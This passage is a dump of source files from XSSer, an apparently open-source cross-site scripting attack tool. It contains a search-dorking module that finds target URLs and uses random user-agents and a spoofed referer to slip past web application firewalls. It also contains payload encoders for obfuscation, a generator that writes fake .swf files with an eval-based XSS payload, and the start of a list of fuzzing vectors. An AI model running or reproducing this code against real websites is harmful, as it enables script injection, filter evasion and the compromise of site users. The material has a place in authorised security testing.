| self.search_engines.append('startpage') 39 | self.search_engines.append('yahoo') 40 | self.search_engines.append('bing') 41 | self.agents = [] # user-agents 42 | try: 43 | f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents 44 | except: 45 | f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing 46 | for line in f: 47 | self.agents.append(line) 48 | 49 | def dork(self, search): 50 | """ 51 | Perform a search and return links. 52 | """ 53 | if self._engine == 'bing': # works at 20-02-2011 -> 19-02-2016 -> 09-04-2018 -> 26-08-2019 54 | search_url = 'https://www.bing.com/search?q="' + str(search) + '"' 55 | print("\nSearching query:", urllib.parse.unquote(search_url)) 56 | elif self._engine == 'yahoo': # works at 20-02-2011 -> 19-02-2016 -> -> 09-04-2018 -> 26-08-2019 57 | search_url = 'https://search.yahoo.com/search?q="' + str(search) + '"' 58 | print("\nSearching query:", urllib.parse.unquote(search_url)) 59 | elif self._engine == 'duck': # works at 26-08-2019 60 | search_url = 'https://duckduckgo.com/html/' 61 | q = 'instreamset:(url):"' + str(search) + '"' # set query to search literally on results 62 | query_string = { 'q':q } 63 | print("\nSearching query:", urllib.parse.unquote(search_url) + " [POST: (" + q + ")]") 64 | elif self._engine == 'startpage': # works at 26-08-2019 65 | search_url = 'https://www.startpage.com/do/asearch' 66 | q = 'url:"' + str(search) + '"' # set query to search literally on results 67 | query_string = { 'cmd':'process_search', 'query':q } 68 | print("\nSearching query:", urllib.parse.unquote(search_url) + " [POST: (" + q + ")]") 69 | else: 70 | print("\n[Error] This search engine is not being supported!\n") 71 | print('-'*25) 72 | print("\n[Info] Use one from this list:\n") 73 | for e in self.search_engines: 74 | print("+ "+e) 75 | print("\n ex: xsser -d 'profile.asp?num=' --De 'duck'") 76 | print(" ex: xsser -l --De 'startpage'") 77 | print("\n[Info] Or try them all:\n\n ex: xsser -d 'news.php?id=' --Da\n") 78 | try: 79 | self.search_url = search_url 80 | user_agent = random.choice(self.agents).strip() # set random user-agent 81 | referer = '127.0.0.1' # set referer to localhost / WAF black magic! 82 | headers = {'User-Agent' : user_agent, 'Referer' : referer} 83 | if self._engine == 'bing' or self._engine == 'yahoo': # using GET 84 | req = urllib.request.Request(search_url, None, headers) 85 | elif self._engine == 'duck' or self._engine == 'startpage': # using POST 86 | data = urllib.parse.urlencode(query_string) 87 | req = urllib.request.Request(search_url, data, headers) 88 | html_data = urllib.request.urlopen(req).read().decode('utf8') 89 | print("\n[Info] Retrieving requested info...\n") 90 | except urllib.error.URLError as e: 91 | if DEBUG: 92 | traceback.print_exc() 93 | print("\n[Error] Cannot connect!") 94 | print("\n" + "-"*50) 95 | return 96 | if self._engine == 'bing': 97 | regex = '

8 | 9 | xsser is free software; you can redistribute it and/or modify it under 10 | the terms of the GNU General Public License as published by the Free 11 | Software Foundation version 3 of the License. 12 | 13 | xsser is distributed in the hope that it will be useful, but WITHOUT ANY 14 | WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS 15 | FOR A PARTICULAR PURPOSE. See the GNU General Public License for more 16 | details. 17 | 18 | You should have received a copy of the GNU General Public License along 19 | with xsser; if not, write to the Free Software Foundation, Inc., 51 20 | Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 21 | """ 22 | import urllib.request, urllib.parse, urllib.error 23 | 24 | class EncoderDecoder(object): 25 | """ 26 | Class to help encoding and decoding strings with different hashing or 27 | encoding algorigthms.. 28 | """ 29 | # encdec functions: 30 | def __init__(self): 31 | self.encmap = { "Str" : lambda x : self._fromCharCodeEncode(x), 32 | "Hex" : lambda x : self._hexEncode(x), 33 | "Hes" : lambda x : self._hexSemiEncode(x), 34 | "Une" : lambda x : self._unEscape(x), 35 | "Dec" : lambda x : self._decEncode(x), 36 | "Mix" : lambda x : self._unEscape(self._fromCharCodeEncode(x)) 37 | } 38 | 39 | def _fromCharCodeEncode(self, string): 40 | """ 41 | Encode to string. 42 | """ 43 | encoded='' 44 | for char in string: 45 | encoded=encoded+","+str(ord(char)) 46 | return encoded[1:] 47 | 48 | def _hexEncode(self, string): 49 | """ 50 | Encode to hex. 51 | """ 52 | encoded='' 53 | for char in string: 54 | encoded=encoded+"%"+hex(ord(char))[2:] 55 | return encoded 56 | 57 | def _hexSemiEncode(self, string): 58 | """ 59 | Encode to semi hex. 60 | """ 61 | encoded='' 62 | for char in string: 63 | encoded=encoded+"&#x"+hex(ord(char))[2:]+";" 64 | return encoded 65 | 66 | def _decEncode(self, string): 67 | """ 68 | Encode to decimal. 69 | """ 70 | encoded='' 71 | for char in string: 72 | encoded=encoded+"&#"+str(ord(char)) 73 | return encoded 74 | 75 | def _unEscape(self, string): 76 | """ 77 | Escape string. 78 | """ 79 | encoded='' 80 | for char in string: 81 | encoded=encoded+urllib.parse.quote(char) 82 | return encoded 83 | 84 | def _ipDwordEncode(self, string): 85 | """ 86 | Encode to dword. 87 | """ 88 | encoded='' 89 | tblIP = string.split('.') 90 | # In the case it's not an IP 91 | if len(tblIP)!=4: 92 | return 0 93 | for number in tblIP: 94 | tmp=hex(int(number))[2:] 95 | if len(tmp)==1: 96 | tmp='0' +tmp 97 | encoded=encoded+tmp 98 | return int(encoded,16) 99 | 100 | def _ipOctalEncode(self, string): 101 | """ 102 | Encode to octal. 103 | """ 104 | encoded='' 105 | tblIP = string.split('.') 106 | # In the case it's not an IP 107 | if len(tblIP)!=4: 108 | return 0 109 | octIP = [oct(int(s)).zfill(4) for s in tblIP] 110 | return ".".join(octIP) 111 | 112 | if __name__ == "__main__": 113 | encdec = EncoderDecoder() 114 | print(encdec._ipOctalEncode("127.0.0.1")) 115 | -------------------------------------------------------------------------------- /core/flashxss.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*-" 3 | # vim: set expandtab tabstop=4 shiftwidth=4: 4 | """ 5 | This file is part of the XSSer project, https://xsser.03c8.net 6 | 7 | Copyright (c) 2010/2019 | psy 8 | 9 | xsser is free software; you can redistribute it and/or modify it under 10 | the terms of the GNU General Public License as published by the Free 11 | Software Foundation version 3 of the License. 12 | 13 | xsser is distributed in the hope that it will be useful, but WITHOUT ANY 14 | WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS 15 | FOR A PARTICULAR PURPOSE. See the GNU General Public License for more 16 | details. 17 | 18 | You should have received a copy of the GNU General Public License along 19 | with xsser; if not, write to the Free Software Foundation, Inc., 51 20 | Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 21 | """ 22 | import os 23 | 24 | class FlashInjections(object): 25 | 26 | def __init__(self, payload =''): 27 | self._payload = payload 28 | 29 | def flash_xss(self, filename, payload): 30 | """ 31 | Create -fake- flash movie (.swf) with XSS codeinjected. 32 | """ 33 | root, ext = os.path.splitext(filename) 34 | if ext.lower() in [".swf"]: 35 | f = open(filename, 'wb') 36 | user_payload = payload 37 | if not user_payload: 38 | user_payload = 'a="get";b="URL";c="javascript:";d="alert("XSS");void(0);";eval(a+b)(c+d);' 39 | if ext.lower() == ".swf": 40 | content = user_payload 41 | f.write(content) 42 | f.close() 43 | flash_results = "\n[Info] XSS Vector: \n\n "+ content + "\n\n[Info] File: \n\n ", root + ext + "\n" 44 | else: 45 | flash_results = "\n[Error] Supported extensions = .swf\n" 46 | return flash_results 47 | 48 | if __name__ == '__main__': 49 | flash_xss_injection = FlashInjections('') 50 | print(flash_xss_injection.flash_xss('FlashXSSpoison.swf' , "")) 51 | -------------------------------------------------------------------------------- /core/fuzzing/DCP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*-" 3 | # vim: set expandtab tabstop=4 shiftwidth=4: 4 | """ 5 | This file is part of the XSSer project, https://xsser.03c8.net 6 | 7 | Copyright (c) 2010/2019 | psy 8 | 9 | xsser is free software; you can redistribute it and/or modify it under 10 | the terms of the GNU General Public License as published by the Free 11 | Software Foundation version 3 of the License. 12 | 13 | xsser is distributed in the hope that it will be useful, but WITHOUT ANY 14 | WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS 15 | FOR A PARTICULAR PURPOSE. See the GNU General Public License for more 16 | details. 17 | 18 | You should have received a copy of the GNU General Public License along 19 | with xsser; if not, write to the Free Software Foundation, Inc., 51 20 | Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 21 | """ 22 | ## This file contains different XSS fuzzing vectors. 23 | ## If you have some new, please email me to [epsylon@riseup.net] 24 | ## Happy Cross Hacking! ;) 25 | 26 | DCPvectors = [ 27 | { 'payload' : """[B64]""", 28 | 'browser' : """[Data Control Protocol Injection]"""}, 29 | { 'payload' : """